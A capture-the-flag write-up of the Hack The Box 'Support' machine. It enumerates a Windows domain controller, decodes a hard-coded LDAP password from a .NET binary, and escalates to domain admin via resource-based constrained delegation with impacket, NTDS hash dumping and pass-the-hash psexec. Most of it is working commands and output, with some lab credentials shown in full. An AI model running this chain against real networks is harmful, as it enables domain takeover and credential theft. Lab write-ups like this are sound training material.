HTB - Support

Scope

Ip Address: 10.10.11.174

Enumeration

Nmap Scan

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -F $ip -Pn 

PORT    STATE SERVICE
53/tcp  open  domain
88/tcp  open  kerberos-sec
135/tcp open  msrpc
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds
5985/tcp open wsman

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -p- --min-rate 10000 $ip -Pn -vv 

PORT      STATE SERVICE        REASON
53/tcp    open  domain         syn-ack
135/tcp   open  msrpc          syn-ack
139/tcp   open  netbios-ssn    syn-ack
445/tcp   open  microsoft-ds   syn-ack
464/tcp   open  kpasswd5       syn-ack
593/tcp   open  http-rpc-epmap syn-ack
636/tcp   open  ldapssl        syn-ack
3268/tcp  open  globalcatLDAP  syn-ack
5985/tcp  open  wsman          syn-ack
9389/tcp  open  adws           syn-ack
49757/tcp open  unknown        syn-ack

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -p53,135,139,445,464,593,636,3268,5985,49757 $ip -Pn -oN script-scan -sCV

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49757/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-07-05T22:01:48
|_  start_date: N/A

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

* Open ports: 53,135,139,445,464,593,636,3268,5985
* UDP Open ports: 53 - 88 - 123 - 389
* Services: DNS - RPC - SMB - NETBIOS - LDAP - KERBEROS - winRM

DNS

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ dig axfr support.htb @$ip                                                                
; <<>> DiG 9.19.19-1-Debian <<>> axfr support.htb @10.10.11.174
;; global options: +cmd
; Transfer failed. 

RPC

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ rpcclient -U "%" $ip                                  
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

SMB

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ smbclient -N -L //$ip                             

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ crackmapexec smb $ip -u ''  -p '' --shares

SMB    10.10.11.174    445    DC   [+] support.htb\: 
SMB    10.10.11.174    445    DC   [-] Error enumerating shares: STATUS_ACCESS_DENIED

I opened a file and list share names in it, Then I created a for loop to find accessible share

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ cat list| awk '{print $1}' | tee -a share.list
ADMIN$
C$
IPC$
NETLOGON
support-tools
SYSVOL

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ for share in $(cat share.list);do echo "\n\tShare Name is: $share\n" && smbclient -N \\\\$ip\\$share;done

<snip>

        Share Name is: support-tools
smb: \> ls                                                                                                                          
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022
<snip>

I will mount the remote share on my kali machine to easily navigate the share

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ mkdir mnt

┌──(kali㉿kali)-[~/…/HTB/machines/Support/New]
└─$ sudo mount -t cifs "\\\\$ip\\support-tools" ./mnt
Password for root@\\10.10.11.174\support-tools:

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ cd mnt 

┌──(kali㉿kali)-[~/…/machines/Support/New]
└─$ ls
7-ZipPortable_21.07.paf.exe  WiresharkPortable64_3.6.5.paf.exe  windirstat1_1_2_setup.exe
SysinternalsSuite.zip        npp.8.4.1.portable.x64.zip
UserInfo.exe.zip             putty.exe

UserInfo.exe.zip File looks interesting, So I will copy it to windows machine

┌──(kali㉿kali)-[~/…/machines/Support/New]
└─$ unzip -l UserInfo.exe.zip 
Archive:  UserInfo.exe.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
    12288  2022-05-27 13:51   UserInfo.exe
    99840  2022-03-01 13:18   CommandLineParser.dll
    22144  2021-10-22 19:42   Microsoft.Bcl.AsyncInterfaces.dll
    47216  2021-10-22 19:48   Microsoft.Extensions.DependencyInjection.Abstractions.dll
    84608  2021-10-22 19:48   Microsoft.Extensions.DependencyInjection.dll
    64112  2021-10-22 19:51   Microsoft.Extensions.Logging.Abstractions.dll
    20856  2020-02-19 05:05   System.Buffers.dll
   141184  2020-02-19 05:05   System.Memory.dll
   115856  2018-05-15 09:29   System.Numerics.Vectors.dll
    18024  2021-10-22 19:40   System.Runtime.CompilerServices.Unsafe.dll
    25984  2020-02-19 05:05   System.Threading.Tasks.Extensions.dll
      563  2022-05-27 12:59   UserInfo.exe.config
---------                     -------
   652675                     12 files

I've downloaded dnSpy.exe before, So I decided to open the files with it, Under LdapQuery tab there is interesting information here

A user has a name support\ldap but the password is protected

public LdapQuery()
	{
	string password = Protected.getPassword();
	this.entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
	this.entry.AuthenticationType = AuthenticationTypes.Secure;
	this.ds = new DirectorySearcher(this.entry);
	}

I clicked on getPassword() Function to see its content

namespace UserInfo.Services  
{    // Token: 0x02000006 RID: 6
	internal class Protected    {
		public static string getPassword()  
		{
			byte[] array = Convert.FromBase64String(Protected.enc_password);
			byte[] array2 = array;
			for (int i = 0; i < array.Length; i++)
				{
					array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
				}
			return Encoding.Default.GetString(array2);  
		}
        // Token: 0x04000005 RID: 5
        private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
        // Token: 0x04000006 RID: 6
        private static byte[] key = Encoding.ASCII.GetBytes("armando");
        }  
}

I can say that it's a decryption function to get the password in secure way involving base64 encoding and xor operation, So I asked chatGPT to rewrite this function in python to be able to run it on my host and here is the code

import base64
class Protected:
	enc_password = "<encrypted>"
	key = "<key>".encode('ascii')

@staticmethod
def get_password():
	array = base64.b64decode(Protected.enc_password)
	array2 = bytearray(array) # bytearray allows in-place modification
	for i in range(len(array)):
		array2[i] = array[i] ^ Protected.key[i % len(Protected.key)] ^ 223
	return array2.decode('ascii')

# Decodes the bytearray to a string # Usage example:
password = Protected.get_password()
print(password)

Run it and you will get the password

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nano get_password.py

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ python3 get_password.py                                             
nvEfEK16^1aM4$e7AclUf8xxxxxxxxxxxxxxx

I verified with crackmapexec and Success :)

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ crackmapexec smb $ip -u 'ldap'  -p 'nvEfEK16^1aM4$e7AclUf8xxxxxxxxxxxxx'

SMB 10.10.11.174 445 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8xxxxxxxxxxx 

Initial Access

---

I tried to connect with winRM but failed So I decided to continue enumerating the domain with bloodhound-python and rpcclient

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ bloodhound-python -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8xxxxxxxxxx' -ns $ip -d support.htb -c all

I Created a zip file to upload it to bloodhound GUI after starting it

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ zip support.zip *.json

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ sudo neo4j start
[sudo] password for kali: 
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:45250). It is available at http://localhost:7474
There may be a short delay until the server is ready.

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ bloodhound 

I put custom query to bloodhound to see which user can PSRemote to the machine

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

I can also see that support User exists from rpcclient command

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ rpcclient -U 'ldap%nvEfEK16^1aM4$e7AclUf8xxxxxxxxxxxx' $ip
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[ldap] rid:[0x450]
user:[support] rid:[0x451]
<snip>

I searched for this account on bloodhound and knew that support account is a member of SHARED SUPPORT ACCOUNTS which has GenericAll rights on DC.SUPPORT.HTB which is an attack path known as Resource based constrianed delegation (RBCD), So If I have the support I can takeover the DC

I search a lot to get the syntax of ldapsearch as it's confusing for me to get information from ldap about user support

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ ldapsearch -H ldap://$ip -x -b "CN=SUPPORT,CN=USERS,DC=SUPPORT,DC=HTB" -s sub "*" -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | tee -a support.output

<snip>
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
<snip>

There is a value in info field, So I will try to connect to the machine with it and I got a hit :)

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ crackmapexec smb $ip -u support -p 'Ironside47pleasure40Watchful'            

SMB  10.10.11.174   445   DC   [+] support.htb\support:Ironside47pleasure40Watchful 

We knew from bloodhound that we can PSRemote with user support, So I fired up evil-winrm and waited for a shell access

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ evil-winrm -i $ip -u support -p 'Ironside47pleasure40Watchful'   

*Evil-WinRM* PS C:\Users\support\Documents> 

*Evil-WinRM* PS C:\Users\support> type Desktop\user.txt
8959fba6ef693c03xxxxxxxxxxxxxx

User flag 8959fba6ef693c03xxxxxxxxxxxx

---

Privilege Escalation

The path to domain admins is already obvious now. We can get the help of this post if we want to perform attack from Linux:

Abusing Resource-Based Constrained Delegation (RBCD) using LinuxAltered Security

We need a fake computer account and the name of the machine account that we can write attribute on.

The machine's name is DC$

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-addcomputer HTB.LOCAL/mrb3n -dc-ip 192.168.x.x -computer-name 'ATTACK$' -computer-pass 'AttackerPC1!'

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-rbcd support.htb/support:'Ironside47pleasure40Watchful' -dc-ip $ip -action write -delegate-from 'ATTACK$' -delegate-to 'DC$'           
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACK$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     ATTACK$      (S-1-5-21-1677581083-3380853377-188903654-5601)

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-getST -spn 'cifs/DC.SUPPORT.HTB' -impersonate Administrator 'support.htb/ATTACK$:AttackerPC1!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.SUPPORT.HTB@SUPPORT.HTB.ccache

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ export KRB5CCNAME =`pwd/Administrator@cifs_DC.SUPPORT.HTB@SUPPORT.HTB.ccache

For some reason, I couldn't connect with psexec.py or dump hashes with secretsdump.py, So I switched to crackmpaexec

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ crackmapexec smb $ip -u administrator -k --use-kcache --ntds

<snip>

SMB         10.10.11.174    445    DC    [+] support.htb\ from ccache         Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddxxxxxxxxxxxx:::

<snip>         

┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-psexec support.htb/administrator@$ip -hashes :bb06cbc02b39abedddxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.11.174.....
[*] Found writable share ADMIN$
[*] Uploading file bNtWYSHx.exe
[*] Opening SVCManager on 10.10.11.174.....
[*] Creating service yBfc on 10.10.11.174.....
[*] Starting service yBfc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>

C:\Windows\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> type root.txt
e99ab2203321xxxxxxxxxxxxxxxx

Root flag: e99ab2203321xxxxxxxxxxxxxxxxxxxx